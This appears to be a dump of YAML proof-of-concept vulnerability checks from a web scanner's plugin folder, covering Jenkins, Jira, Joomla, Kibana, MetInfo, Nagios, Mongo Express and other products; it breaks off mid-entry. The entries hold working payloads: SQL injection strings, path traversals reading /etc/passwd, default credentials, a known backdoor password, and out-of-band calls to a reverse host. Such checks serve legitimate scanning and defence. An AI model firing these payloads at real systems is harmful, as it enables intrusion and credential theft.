/src/plugins/pocs/jenkins-cve-2018-1000600.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jenkins-cve-2018-1000600 2 | set: 3 | reverse: newReverse() 4 | reverseUrl: reverse.url 5 | rules: 6 | - method: GET 7 | path: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl={{reverseUrl}} 8 | expression: | 9 | response.status == 200 && reverse.wait(5) 10 | detail: 11 | author: PickledFish(https://github.com/PickledFish) 12 | links: 13 | - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/jenkins-cve-2018-1000861-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jenkins-cve-2018-1000861-rce 2 | set: 3 | rand: randomLowercase(4) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27{{rand}}%27,%20version=%271%27)%0aimport%20Payload; 8 | follow_redirects: false 9 | expression: >- 10 | response.status == 200 && response.body.bcontains(bytes("package#" + rand)) 11 | detail: 12 | author: p0wd3r 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/jenkins-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jenkins-unauthorized-access 2 | set: 3 | r1: randomInt(1000, 9999) 4 | r2: randomInt(1000, 9999) 5 | rules: 6 | - method: GET 7 | path: /script 8 | follow_redirects: false 9 | expression: response.status == 200 10 | search: | 11 | "Jenkins-Crumb", "(?P.+?)"\); 12 | - method: POST 13 | path: /script 14 | body: | 15 | script=printf%28%27{{r1}}%25%25{{r2}}%27%29%3B&Jenkins-Crumb={{var}}&Submit=%E8%BF%90%E8%A1%8C 16 | expression: response.status == 200 && response.body.bcontains(bytes(string(r1) + "%" + string(r2))) 17 | detail: 18 | author: MrP01ntSun(https://github.com/MrPointSun) 19 | links: 20 | - https://www.cnblogs.com/yuzly/p/11255609.html 21 | - https://blog.51cto.com/13770310/2156663 22 | -------------------------------------------------------------------------------- /src/plugins/pocs/jetty-cve-2021-28164.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jetty-cve-2021-28164 2 | rules: 3 | - method: GET 4 | path: /%2e/WEB-INF/web.xml 5 | follow_redirects: false 6 | expression: 7 | response.status == 200 && response.content_type == "application/xml" && response.body.bcontains(b"") 8 | detail: 9 | author: Sup3rm4nx0x (https://github.com/Sup3rm4nx0x) 10 | links: 11 | - https://www.linuxlz.com/aqld/2309.html 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/jira-cve-2019-8442.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2019-8442 2 | rules: 3 | - method: GET 4 | path: "/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml" 5 | expression: | 6 | response.status == 200 && response.body.bcontains(bytes(string(b"com.atlassian.jira"))) && response.content_type.contains("application/xml") 7 | detail: 8 | author: pa55w0rd(www.pa55w0rd.online/) 9 | Affected Version: "<7.13.4, 8.00-8.0.4, 8.1.0-8.1.1" 10 | links: 11 | - https://nvd.nist.gov/vuln/detail/CVE-2019-8442 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/jira-cve-2019-8449.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2019-8449 2 | rules: 3 | - method: GET 4 | path: /rest/api/latest/groupuserpicker?query=testuser12345&maxResults=50&showAvatar=false 5 | expression: | 6 | response.status == 200 && response.content_type.icontains("json") && response.headers["X-AREQUESTID"] != "" && response.body.bcontains(b"total") && response.body.bcontains(b"groups") && response.body.bcontains(b"header") && response.body.bcontains(b"users") 7 | detail: 8 | author: MaxSecurity(https://github.com/MaxSecurity) 9 | links: 10 | - https://xz.aliyun.com/t/7219 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/jira-cve-2020-14179.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2020-14179 2 | rules: 3 | - method: GET 4 | path: /secure/QueryComponent!Default.jspa 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"com.atlassian.jira") 8 | detail: 9 | author: harris2015(https://github.com/harris2015) 10 | links: 11 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14179 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/jira-cve-2020-14181.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2020-14181 2 | set: 3 | r: randomLowercase(8) 4 | rules: 5 | - method: GET 6 | path: /secure/ViewUserHover.jspa?username={{r}} 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes("/secure/ViewProfile.jspa?name=" + r)) && response.body.bcontains(bytes("com.atlassian.jira")) 10 | detail: 11 | author: whwlsfb(https://github.com/whwlsfb) 12 | links: 13 | - https://www.tenable.com/cve/CVE-2020-14181 14 | - https://twitter.com/ptswarm/status/1318914772918767619 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/jira-ssrf-cve-2019-8451.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-ssrf-cve-2019-8451 2 | set: 3 | reverse: newReverse() 4 | originScheme: request.url.scheme 5 | originHost: request.url.host 6 | reverseURL: reverse.domain 7 | rules: 8 | - method: GET 9 | path: >- 10 | /plugins/servlet/gadgets/makeRequest?url={{originScheme}}://{{originHost}}@{{reverseURL}} 11 | headers: 12 | X-Atlassian-Token: no-check 13 | expression: | 14 | reverse.wait(5) 15 | detail: 16 | author: jingling(https://github.com/shmilylty) 17 | links: 18 | - https://jira.atlassian.com/browse/JRASERVER-69793 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/joomla-component-vreview-sql.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-joomla-component-vreview-sql 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: POST 6 | path: /index.php?option=com_vreview&task=displayReply 7 | headers: 8 | Content-Type: application/x-www-form-urlencoded 9 | body: >- 10 | profileid=-8511 OR 1 GROUP BY CONCAT(0x7e,md5({{r1}}),0x7e,FLOOR(RAND(0)*2)) HAVING MIN(0)# 11 | follow_redirects: true 12 | expression: | 13 | response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 14 | detail: 15 | author: 南方有梦(https://github.com/hackgov) 16 | Affected Version: "1.9.11" 17 | links: 18 | - https://www.exploit-db.com/exploits/46227 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/joomla-cve-2015-7297-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-joomla-cve-2015-7297-sqli 2 | rules: 3 | - method: GET 4 | path: /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1) 5 | expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2") 6 | detail: 7 | links: 8 | - https://www.exploit-db.com/exploits/38797 9 | - http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html 10 | - https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/ -------------------------------------------------------------------------------- /src/plugins/pocs/joomla-cve-2017-8917-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-joomla-cve-2017-8917-sqli 2 | rules: 3 | - method: GET 4 | path: "/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)" 5 | expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2") 6 | detail: 7 | links: 8 | - https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2017-8917 -------------------------------------------------------------------------------- /src/plugins/pocs/joomla-cve-2018-7314-sql.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-joomla-cve-2018-7314-sql 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: /index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5({{r1}})))-- X 7 | expression: | 8 | response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 9 | detail: 10 | author: 南方有梦(http://github.com/hackgov) 11 | Affected Version: "3.0.2" 12 | links: 13 | - https://www.exploit-db.com/exploits/44160 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/jupyter-notebook-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jupyter-notebook-unauthorized-access 2 | rules: 3 | - method: GET 4 | path: "/terminals/3" 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"terminals/websocket") && !response.body.bcontains(b"Password:") 8 | detail: 9 | author: bufsnake(https://github.com/bufsnake) 10 | links: 11 | - https://vulhub.org/#/environments/jupyter/notebook-rce/ 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/kafka-manager-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kafka-manager-unauth 2 | rules: 3 | - method: GET 4 | path: / 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"Kafka Manager") && response.body.bcontains(b"Kafka Manager") && response.body.bcontains(b"Add Cluster") 8 | detail: 9 | author: Aquilao(https://github.com/Aquilao) 10 | links: 11 | - https://blog.csdn.net/qq_36923426/article/details/111361158 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/kibana-cve-2018-17246.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kibana-cve-2018-17246 2 | rules: 3 | - method: GET 4 | path: /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd 5 | follow_redirects: false 6 | expression: | 7 | response.headers["kbn-name"] == "kibana" && response.content_type.contains("application/json") && response.body.bcontains(bytes("\"statusCode\":500")) && response.body.bcontains(bytes("\"message\":\"An internal server error occurred\"")) 8 | detail: 9 | author: canc3s(https://github.com/canc3s) 10 | kibana_version: before 6.4.3 and 5.6.13 11 | links: 12 | - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 13 | - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/kibana-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kibana-unauth 2 | rules: 3 | - method: GET 4 | path: /app/kibana 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b".kibanaWelcomeView") 8 | detail: 9 | author: Isaac(https://github.com/IsaacQiang) 10 | links: 11 | - https://zhuanlan.zhihu.com/p/61215662 -------------------------------------------------------------------------------- /src/plugins/pocs/kingsoft-v8-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kingsoft-v8-default-password 2 | rules: 3 | - method: POST 4 | path: /inter/ajax.php?cmd=get_user_login_cmd 5 | body: "{\"get_user_login_cmd\":{\"name\":\"admin\",\"password\":\"21232f297a57a5a743894a0e4a801fc3\"}}" 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.body.bcontains(b"ADMIN") && response.body.bcontains(b"userSession") 9 | detail: 10 | author: B1anda0(https://github.com/B1anda0) 11 | links: 12 | - https://idc.wanyunshuju.com/aqld/2123.html -------------------------------------------------------------------------------- /src/plugins/pocs/kingsoft-v8-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kingsoft-v8-file-read 2 | rules: 3 | - method: GET 4 | path: >- 5 | /htmltopdf/downfile.php?filename=/windows/win.ini 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]")) && response.headers["Content-Type"].contains("application/zip") 9 | 10 | detail: 11 | author: kzaopa(https://github.com/kzaopa) 12 | links: 13 | - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/b6f8fbfef46ad1c3f8d5715dd19b00ca875341c2/_book/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%87%91%E5%B1%B1/%E9%87%91%E5%B1%B1%20V8%20%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/kong-cve-2020-11710-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kong-cve-2020-11710-unauth 2 | rules: 3 | - method: GET 4 | path: / 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"kong_env") 7 | - method: GET 8 | path: /status 9 | expression: | 10 | response.status == 200 && response.body.bcontains(b"kong_db_cache_miss") 11 | detail: 12 | author: Loneyer 13 | links: 14 | - https://mp.weixin.qq.com/s/Ttpe63H9lQe87Uk0VOyMFw 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/kubernetes-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kubernetes-unauth 2 | rules: 3 | - method: GET 4 | path: /api/v1/nodes 5 | expression: | 6 | response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"\"kubeletVersion\": \"v") && response.body.bcontains(b"\"containerRuntimeVersion\"") 7 | detail: 8 | author: mumu0215(https://github.com/mumu0215) 9 | links: 10 | - http://luckyzmj.cn/posts/15dff4d3.html 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/kyan-network-monitoring-account-password-leakage.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kyan-network-monitoring-account-password-leakage 2 | rules: 3 | - method: GET 4 | path: /hosts 5 | expression: "true" 6 | search: Password=(?P.+) 7 | - method: POST 8 | path: /login.php 9 | body: user=admin&passwd={{pass}} 10 | follow_redirects: true 11 | expression: | 12 | response.status == 200 && response.body.bcontains(b"设备管理系统") && response.body.bcontains(b"context.php") && response.body.bcontains(b"left.php") 13 | detail: 14 | author: B1anda0(https://github.com/B1anda0) 15 | links: 16 | - https://mp.weixin.qq.com/s/6phWjDrGG0pCpGuCdLusIg 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/landray-oa-custom-jsp-fileread.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-landray-oa-custom-jsp-fileread 2 | groups: 3 | linux: 4 | - method: POST 5 | path: /sys/ui/extend/varkind/custom.jsp 6 | body: var={"body":{"file":"file:///etc/passwd"}} 7 | expression: | 8 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 9 | windows: 10 | - method: POST 11 | path: /sys/ui/extend/varkind/custom.jsp 12 | body: var={"body":{"file":"file:///c://windows/win.ini"}} 13 | expression: | 14 | response.status == 200 && response.body.bcontains(b"for 16-bit app support") 15 | detail: 16 | author: B1anda0(https://github.com/B1anda0) 17 | links: 18 | - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/lanproxy-cve-2021-3019-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-lanproxy-cve-2021-3019-lfi 2 | rules: 3 | - method: GET 4 | path: "/../conf/config.properties" 5 | expression: | 6 | response.status == 200 && response.body.bcontains(bytes(string(b"config.admin.username"))) && response.body.bcontains(bytes(string(b"config.admin.password"))) && response.content_type.contains("application/octet-stream") 7 | detail: 8 | author: pa55w0rd(www.pa55w0rd.online/) 9 | Affected Version: "lanproxy 0.1" 10 | links: 11 | - https://github.com/ffay/lanproxy/issues/152 12 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/laravel-cve-2021-3129.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-laravel-cve-2021-3129 2 | set: 3 | r: randomLowercase(12) 4 | rules: 5 | - method: POST 6 | path: /_ignition/execute-solution 7 | headers: 8 | Content-Type: application/json 9 | body: |- 10 | { 11 | "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", 12 | "parameters": { 13 | "variableName": "username", 14 | "viewFile": "{{r}}" 15 | } 16 | } 17 | follow_redirects: true 18 | expression: > 19 | response.status == 500 && response.body.bcontains(bytes("file_get_contents(" + string(r) + ")")) && response.body.bcontains(bytes("failed to open stream")) 20 | detail: 21 | author: Jarcis-cy(https://github.com/Jarcis-cy) 22 | links: 23 | - https://github.com/vulhub/vulhub/blob/master/laravel/CVE-2021-3129 24 | -------------------------------------------------------------------------------- /src/plugins/pocs/laravel-debug-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-laravel-debug-info-leak 2 | rules: 3 | - method: POST 4 | path: / 5 | follow_redirects: false 6 | expression: > 7 | response.status == 405 && response.body.bcontains(b"MethodNotAllowedHttpException") && response.body.bcontains(b"Environment & details") && (response.body.bcontains(b"vendor\\laravel\\framework\\src\\Illuminate\\Routing\\RouteCollection.php") || response.body.bcontains(b"vendor/laravel/framework/src/Illuminate/Routing/RouteCollection.php")) 8 | detail: 9 | author: Dem0ns (https://github.com/dem0ns) 10 | links: 11 | - https://github.com/dem0ns/improper/tree/master/laravel/5_debug 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/laravel-improper-webdir.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-laravel-improper-webdir 2 | rules: 3 | - method: GET 4 | path: /storage/logs/laravel.log 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && (response.content_type.contains("plain") || response.content_type.contains("octet-stream")) && (response.body.bcontains(b"vendor\\laravel\\framework") || response.body.bcontains(b"vendor/laravel/framework")) && (response.body.bcontains(b"stacktrace") || response.body.bcontains(b"Stack trace")) 8 | detail: 9 | author: Dem0ns (https://github.com/dem0ns) 10 | links: 11 | - https://github.com/dem0ns/improper 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/maccms-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-maccms-rce 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: /index.php?m=vod-search&wd={if-A:printf(md5({{r}}))}{endif-A} 7 | follow_redirects: false 8 | expression: | 9 | response.body.bcontains(bytes(md5(string(r)))) 10 | detail: 11 | Affected Version: "maccms8.x" 12 | author: hanxiansheng26(https://github.com/hanxiansheng26) 13 | links: 14 | - https://www.cnblogs.com/test404/p/7397755.html -------------------------------------------------------------------------------- /src/plugins/pocs/maccmsv10-backdoor.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-maccmsv10-backdoor 2 | rules: 3 | - method: POST 4 | path: /extend/Qcloud/Sms/Sms.php 5 | headers: 6 | Content-Type: application/x-www-form-urlencoded 7 | body: getpwd=WorldFilledWithLove 8 | follow_redirects: false 9 | expression: > 10 | response.status == 200 && response.body.bcontains(b"扫描后门") && response.body.bcontains(b"反弹端口") && response.body.bcontains(b"文件管理") 11 | detail: 12 | author: FiveAourThe(https://github.com/FiveAourThe) 13 | links: 14 | - https://www.cnblogs.com/jinqi520/p/11596500.html 15 | - https://www.t00ls.net/thread-53291-1-1.html 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/metinfo-cve-2019-16996-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-cve-2019-16996-sqli 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: GET 7 | path: >- 8 | /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,{{r1}}*{{r2}},5,6,7%20limit%205,1%20%23 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 12 | detail: 13 | author: JingLing(https://hackfun.org/) 14 | metinfo_version: 7.0.0beta 15 | links: 16 | - https://y4er.com/post/metinfo7-sql-tips/#sql-injection-1 -------------------------------------------------------------------------------- /src/plugins/pocs/metinfo-cve-2019-16997-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-cve-2019-16997-sqli 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: POST 7 | path: /admin/?n=language&c=language_general&a=doExportPack 8 | headers: 9 | Content-Type: application/x-www-form-urlencoded 10 | body: 'appno= 1 union SELECT {{r1}}*{{r2}},1&editor=cn&site=web' 11 | follow_redirects: true 12 | expression: | 13 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 14 | detail: 15 | author: JingLing(https://hackfun.org/) 16 | metinfo_version: 7.0.0beta 17 | links: 18 | - https://y4er.com/post/metinfo7-sql-tips/#sql-injection-2 -------------------------------------------------------------------------------- /src/plugins/pocs/metinfo-cve-2019-17418-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-cve-2019-17418-sqli 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: GET 7 | path: >- 8 | /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+{{r1}}*{{r2}},1--+&site=admin 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 12 | detail: 13 | author: JingLing(https://hackfun.org/) 14 | metinfo_version: 7.0.0beta 15 | links: 16 | - https://github.com/evi1code/Just-for-fun/issues/2 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/metinfo-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-file-read 2 | rules: 3 | - method: GET 4 | path: "/include/thumb.php?dir=http/.....///.....///config/config_db.php" 5 | expression: response.status == 200 && response.body.bcontains(b"con_db_pass") && response.body.bcontains(b"con_db_host") && response.body.bcontains(b"con_db_name") 6 | detail: 7 | author: amos1 8 | links: 9 | - https://www.cnblogs.com/-qing-/p/10889467.html 10 | -------------------------------------------------------------------------------- /src/plugins/pocs/metinfo-lfi-cnvd-2018-13393.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-lfi-cnvd-2018-13393 2 | rules: 3 | - method: GET 4 | path: /include/thumb.php?dir=http\..\admin\login\login_check.php 5 | follow_redirects: true 6 | expression: | 7 | response.body.bcontains(b"- 11 | document=this.constructor.constructor('return process')().mainModule.require('http').get('{{reverseURL}}') 12 | follow_redirects: true 13 | expression: > 14 | reverse.wait(5) 15 | detail: 16 | vulnpath: '/checkValid' 17 | author: fnmsd(https://github.com/fnmsd) 18 | description: 'Mongo Express CVE-2019-10758 Code Execution' 19 | links: 20 | - https://github.com/masahiro331/CVE-2019-10758 21 | - https://www.twilio.com/blog/2017/08/http-requests-in-node-js.html -------------------------------------------------------------------------------- /src/plugins/pocs/mpsec-isg1000-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-mpsec-isg1000-file-read 2 | rules: 3 | - method: GET 4 | path: /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd 5 | expression: | 6 | response.status == 200 && response.content_type.contains("text/plain") && response.headers["set-cookie"].contains("USGSESSID=") && "root:[x*]?:0:0:".bmatches(response.body) 7 | detail: 8 | author: YekkoY 9 | description: "迈普 ISG1000安全网关 任意文件下载漏洞" 10 | links: 11 | - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E8%BF%88%E6%99%AE/%E8%BF%88%E6%99%AE%20ISG1000%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.html?h=isg1000 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/msvod-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-msvod-sqli 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: "/images/lists?cid=1 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,md5({{r1}}))) desc --+a" 7 | expression: | 8 | response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 9 | detail: 10 | author: jinqi 11 | links: 12 | - https://github.com/jinqi520 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/myucms-lfr.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-myucms-lfr 2 | rules: 3 | - method: GET 4 | path: /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 5 | expression: | 6 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 7 | detail: 8 | author: jinqi 9 | links: 10 | - https://github.com/jinqi520 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/nagio-cve-2018-10735.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nagio-cve-2018-10735 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: GET 6 | path: /nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5({{r}}))%23 7 | follow_redirects: false 8 | expression: | 9 | response.body.bcontains(bytes(md5(string(r)))) 10 | detail: 11 | author: 0x_zmz(github.com/0x-zmz) 12 | Affected Version: "Nagios XI 5.2.x以及小于5.4.13的5.4.x" 13 | links: 14 | - https://www.seebug.org/vuldb/ssvid-97265 15 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10736 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/nagio-cve-2018-10736.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nagio-cve-2018-10736 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: GET 6 | path: /nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{r}}))%23 7 | follow_redirects: false 8 | expression: | 9 | response.body.bcontains(bytes(md5(string(r)))) 10 | detail: 11 | author: 0x_zmz(github.com/0x-zmz) 12 | Affected Version: "Nagios XI 5.2.x以及小于5.4.13的5.4.x" 13 | links: 14 | - https://www.seebug.org/vuldb/ssvid-97266 15 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10736 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/nagio-cve-2018-10737.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nagio-cve-2018-10737 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: /nagiosql/admin/logbook.php 7 | headers: 8 | Content-Type: application/x-www-form-urlencoded 9 | body: 10 | txtSearch=' and (select 1 from(select count(*),concat((select (select (select md5({{r}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# 11 | follow_redirects: false 12 | expression: | 13 | response.body.bcontains(bytes(md5(string(r)))) 14 | detail: 15 | author: 0x_zmz(github.com/0x-zmz) 16 | Affected Version: "Nagios XI 5.2.x以及小于5.4.13的5.4.x" 17 | links: 18 | - https://www.seebug.org/vuldb/ssvid-97267 19 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10737 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/nagio-cve-2018-10738.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nagio-cve-2018-10738 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: /nagiosql/admin/menuaccess.php 7 | headers: 8 | Content-Type: application/x-www-form-urlencoded 9 | body: 10 | selSubMenu=1&subSave=1&chbKey1=-1%' and (select 1 from(select count(*),concat((select (select (select md5({{r}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# 11 | follow_redirects: false 12 | expression: | 13 | response.body.bcontains(bytes(md5(string(r)))) 14 | detail: 15 | author: 0x_zmz(github.com/0x-zmz) 16 | Affected Version: "Nagios XI 5.2.x以及小于5.4.13的5.4.x" 17 | links: 18 | - https://www.seebug.org/vuldb/ssvid-97268 19 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10738 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/natshell-arbitrary-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-natshell-arbitrary-file-read 2 | rules: 3 | - method: GET 4 | path: /download.php?file=../../../../../etc/passwd 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && "(root|toor):[x*]:0:0:".bmatches(response.body) 8 | 9 | detail: 10 | author: Print1n(http://print1n.top) 11 | links: 12 | - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/netentsec-icg-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-netentsec-icg-default-password 2 | rules: 3 | - method: POST 4 | path: /user/login/checkPermit 5 | body: usrname=ns25000&pass=ns25000 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"\"agreed\":true") 8 | detail: 9 | author: B1anda0(https://github.com/B1anda0) 10 | links: 11 | - https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603 -------------------------------------------------------------------------------- /src/plugins/pocs/netentsec-ngfw-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-netentsec-ngfw-rce 2 | set: 3 | r2: randomLowercase(10) 4 | rules: 5 | - method: POST 6 | path: /directdata/direct/router 7 | body: | 8 | 